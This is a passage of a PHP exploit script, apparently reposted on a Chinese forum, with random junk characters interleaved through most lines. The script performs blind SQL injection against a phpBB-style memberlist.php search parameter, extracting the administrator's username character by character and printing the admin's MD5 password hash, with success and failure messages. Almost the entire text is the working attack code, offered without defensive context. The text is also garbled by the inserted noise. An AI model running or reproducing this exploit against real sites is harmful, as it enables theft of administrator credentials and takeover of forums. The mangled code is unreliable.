    $ z! N( u7 y7 ^+ e! `0 Xfor ($i=0; $i<=255; $i++) $ q8 r: E4 A' B, k. N7 y
    {
    0 E+ Y8 m8 H6 f. Z: s5 T1 v6 a  Z$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    6 m% y0 S( e* P* q/ Iecho "sql -> ".$sql."
    0 l# S5 O7 A: F4 `( C" n  L  v9 P"; ! o$ n2 l4 G- U" c+ }$ y& B7 S
    $sql=urlencode(strtoupper($sql));
    : D, e; l: a/ J  _$data="username="; 4 O( x# Z* N' N8 ?/ o
    $data.="&amp;icq="; 4 d  f- p& D, }- W- M6 a
    $data.="&amp;email="; * G4 {6 ]" |7 F3 O( O# B
    $data.="&amp;aim="; 4 o9 W/ c  Q: z& t6 ?
    $data.="&amp;joined_select=lt";
    5 _# K& \. E" t* ^  A# I1 V( z: k$data.="&amp;joined=";
    - ~/ p( v) @9 n! t$data.="&amp;yahoo="; ! z9 g# W( [% C+ ]) e
    $data.="&amp;active_select=lt"; , a/ @$ I- j3 E5 X' r# e! ]
    $data.="&amp;active=";
    - s! z' L- A; [$data.="&amp;msn=";
    ! D0 {, R6 @" I' _+ L$data.="&amp;count_select=eq"; * i0 E- U/ X  U/ y" ]. V* i
    $data.="&amp;count=";
    6 K& Z( W  W9 j$data.="&amp;jabber="; - w) k' K, p/ @& l, A' t" k1 Y. I
    $data.="&amp;sk=c"; & y, h" q2 w" s! T" b, ~
    $data.="&amp;sd=a"; 3 ~3 \. K2 O4 r7 |- c2 y
    $data.="&amp;ip=".$sql;
    + i. k8 {, j& H# U5 [" d% n3 L$data.="&amp;search_group_id=0"; & l! q! X4 t: F" |  Y/ u6 ^
    $data.="&amp;submit=Search";
    9 A- ?) @4 }# ~) |' E8 n9 A$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0( ]5 O8 \7 O7 @1 e, Q
    "; % q$ g8 n; H5 i0 F- @
    $packet.="Content-Type: application/x-www-form-urlencoded7 S/ F; S. k8 K2 J/ |+ J, p
    ";
    3 x  z9 m6 s. |+ z7 P2 M$packet.="Host: ".$host."+ N9 y- L3 E: f1 K
    ";
    7 o! d# _3 r0 _( J6 B! ^& f$packet.="Content-Length: ".strlen($data)."
    ) n  Y4 C- @9 C7 Q6 }"; 6 i% T1 b2 Y" @2 z0 A
    $packet.="Connection: Close- |, C/ J! M/ g3 p; T) V; z# ]& ^
    "; 6 k* Q. v) n( {7 w7 S
    $packet.="Cookie: ".$cookie." ( m0 y1 y( G! i. M0 c4 g2 b
    * d  t2 @& W* L6 H& _8 O
    ";
    1 ^8 ^# T9 N! Q- ]$packet.=$data; ; P( L' V$ f+ F" v
    sendpacketii($packet); . i/ h+ w  ?  Y! M
    if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]
    4 S3 B. u2 A( N& `";sleep(2);break;}
    ; d& \1 S% F  z} 4 J' [, o# E6 T; S$ R2 ~, t' @4 j+ W$ J
    if ($i==255) {die("Exploit failed...");} : K- O5 _; T3 b' u5 c
    $j++; 8 I' l8 Q$ i( ^- g6 x
    }
    - ?# \$ h6 _: t& e6 \3 Wecho "--------------------------------------------------------------------, ~# h$ j' R+ E6 B1 P1 B
    "; , d8 O! _( Q& F6 g! X7 ?
    echo "admin -> ".$admin."9 s5 k/ z/ k  r! _* l
    ";
      m  e/ @  |" R& u% ?, v" C6 V) v3 aecho "password (md5) -> ".$password."
    5 b" s" s. [9 B' w";
      @& S* |& t: y6 ~1 X' \2 }echo "--------------------------------------------------------------------
    & I/ [* }' A  ?. F: y"; : K; x5 E+ Q' ~, L; i
    function is_hash($hash) + T' j2 K% J" {* Q: V6 d
    {
    ' T% G0 Q6 n! h2 V4 Nif (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    ) L. W; O/ C% S( ?. E0 x  A, @$ Velse {return false;} 5 h6 P/ V6 P% G/ G
    } - Y: B* y  v0 E2 [/ W" g
    if (is_hash($password)) {echo "Exploit succeeded...";} 2 z1 L+ u7 ~% E" _+ X
    else {echo "Exploit failed...";}
    , q, q6 U; J- H6 b4 M' B?>
    4 a- f( F# E" Q9 q7 c' X$ `) |! G/ T' M; G' o# ~  ?$ h( Z
      }' I  R# b5 t; V5 h2 V

    - a& b# e' X- d7 c" H/ J; A6 g
    ! `1 B" Z6 {/ h7 C
    . ~( `! u$ W& L9 t! B9 o4 C+ L
    " C& u' [( O: m! @" x
    9 n# R, K* w3 n0 c3 A! @9 B% Y) B' z

    , D3 x. B) y+ P- n, {+ x- A
    / H# ?& _. ^! s4 c. Y8 y
    ( a5 R6 x( u/ o- Q& r: [+ Z
    3 Z/ _! Z& e4 P7 @; S# R; C, n$ ~
    ( V9 h) |, p& W0 q
    % {9 l* \8 N4 s6 q  m% O3 u- ~
    3 B) |) `9 a+ m6 h$ K. W" P% c: x( Q" h1 I, @1 W$ w1 D
    ! o( R0 Z$ E8 y+ k5 G

    7 ?/ O2 U* p/ [( E$ Q8 d公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表